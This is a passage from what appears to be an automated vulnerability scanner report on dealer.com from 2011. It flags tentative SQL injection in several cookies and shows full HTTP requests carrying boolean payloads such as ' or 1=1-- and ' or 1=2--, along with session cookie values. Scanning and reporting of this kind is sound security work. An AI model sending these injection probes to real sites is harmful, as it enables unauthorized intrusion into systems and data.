   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictu
...[SNIP]...

Request 2

GET /products/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003094; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fproducts%2F%22%3Bi%3A1%3Bs%3A17%3A%22%2Fcompany%2Fcontact%2F%22%3Bi%3A2%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586%20and%201%3d2--%20; __utmb=161351586.52.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20273
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003499; expires=Mon, 16-Apr-2012 01:24:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We wanted to be a true eCommerce portal and other providers weren't able to do what we wanted. After searching, it was a complete no-brainer. Dealer.com has all the capabilities we needed.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Whether you are 1000 miles away or whether you&#8217;re 100 miles away, you really feel that you&#8217;re part of this Dealer.com family.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>I don't care who your website provider is, if it's not Dealer.com you need to at least take a look at them. I give them my absolute whole-hearted endorsement. I put my name on it. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdot
...[SNIP]...
1.15. http://www.dealer.com/products/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./ cookie appears to be vulnerable to SQL injection attacks. The payloads 10057724'%20or%201%3d1--%20 and 10057724'%20or%201%3d2--%20 were each submitted in the com.silverpop.iMA.page_visit./ cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /products/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=110057724'%20or%201%3d1--%20; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002624; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fproducts%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fproducts%2Fwebsites%2F%22%3Bi%3A2%3Bs%3A11%3A%22%2Fsolutions%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.12.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20025
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:11:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002718; expires=Mon, 16-Apr-2012 01:11:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I really enjoy being able to go in and add a page, create the meta data for that page, and immediately have it show up. It has been tremendously helpful for us.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of the benefits of Dealer.com is when you manage a whole group, you can log into ControlCenter&#8482; and easily toggle between all stores. It&#8217;s seamless!</p>
   <cite>Kendall Burger, Hansel Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.j
...[SNIP]...

Request 2

GET /products/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=110057724'%20or%201%3d2--%20; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002624; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fproducts%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fproducts%2Fwebsites%2F%22%3Bi%3A2%3Bs%3A11%3A%22%2Fsolutions%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.12.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20096
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:11:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002718; expires=Mon, 16-Apr-2012 01:11:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>For dealers who want to compete using SEO, they don&#8217;t need to build outside microsites for content anymore. They can do it right inside the Dealer.com platform.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/w
...[SNIP]...
1.16. http://www.dealer.com/products/online-advertising/powermail/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./showcase/featured-client/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/online-advertising/powermail/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./showcase/featured-client/ cookie appears to be vulnerable to SQL injection attacks. The payloads 16176424%20or%201%3d1--%20 and 16176424%20or%201%3d2--%20 were each submitted in the com.silverpop.iMA.page_visit./showcase/featured-client/ cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /products/online-advertising/powermail/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/powermail/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=116176424%20or%201%3d1--%20; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002861; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.43.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20123
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003558; expires=Mon, 16-Apr-2012 01:25:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>For dealers who want to compete using SEO, they don&#8217;t need to build outside microsites for content anymore. They can do it right inside the Dealer.com platform.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The back-end tool is one of the simplest I've seen. It's like working with a Microsoft Office program. Everything is easily spelled out for you.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/s
...[SNIP]...

Request 2

GET /products/online-advertising/powermail/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/powermail/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=116176424%20or%201%3d2--%20; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002861; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.43.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20233
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003559; expires=Mon, 16-Apr-2012 01:25:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Dealer.com's backend tool is definitely the best in the industry. I like the simplicity of one login, and how all the webstats are one click away.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service
...[SNIP]...
1.17. http://www.dealer.com/products/websites/media/uploads/page/loading.gif [ssoid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/websites/media/uploads/page/loading.gif

Issue detail

The ssoid cookie appears to be vulnerable to SQL injection attacks. The payloads 18178575'%20or%201%3d1--%20 and 18178575'%20or%201%3d2--%20 were each submitted in the ssoid cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /products/websites/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/websites/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e0618178575'%20or%201%3d1--%20; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002620; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts%2Fwebsites%2F%22%3Bi%3A1%3Bs%3A11%3A%22%2Fsolutions%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A3%3Bs%3A25%3A%22%2Fsolutions%2Fdealer-groups%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.11.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19871
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:10:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002658; expires=Mon, 16-Apr-2012 01:10:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We've been a client of Dealer.com going on 2 years. It's been an awesome relationship right from the get-go.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>At Dealer.com, Internet Marketing is their passion. It&#8217;s what they live and breathe, so we know that they will be on the leading edge.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The TotalControl DOMINATOR package really seems like the best automotive pay-per-click tool that I have discovered to date.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog
...[SNIP]...

Request 2

GET /products/websites/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/websites/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e0618178575'%20or%201%3d2--%20; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002620; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts%2Fwebsites%2F%22%3Bi%3A1%3Bs%3A11%3A%22%2Fsolutions%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A3%3Bs%3A25%3A%22%2Fsolutions%2Fdealer-groups%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.11.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
